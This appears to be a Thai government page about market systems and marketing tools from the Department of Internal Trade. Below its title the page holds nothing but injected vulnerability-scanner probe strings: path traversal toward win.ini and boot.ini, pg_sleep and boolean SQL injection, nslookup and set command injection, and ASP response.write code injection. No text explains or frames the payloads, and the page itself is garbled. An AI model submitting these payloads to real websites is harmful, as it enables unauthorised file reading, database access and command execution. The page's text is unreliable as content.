ระบบตลาดและเครื่องมือทางการตลาด 
ระบบตลาดและเครื่องมือทางการตลาด
กองส่งเสริมและบริหารระบบตลาด กรมการค้าภายใน

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini


1..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini


1................windowswin.ini


1%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini


1../../../../../../../../../../windows/win.ini%00.jpg


1../../../../../../../../../../boot.ini


1../../../../../../../../../../windows/win.ini


1
1-1));select pg_sleep(9); --


1-1);select pg_sleep(9); --


1-1;select pg_sleep(9); --


1nfxubtfY


1-1" OR 2+661-661-1=0+0+0+1 --


1-1 OR 2+940-940-1=0+0+0+1


1-1 OR 2+572-572-1=0+0+0+1 --


1ZwxW1BKe


1$(nslookup YdnC71Z4)


1set|set&set


1"+response.write(9637063*9608559)+"


1response.write(9637063*9608559)


1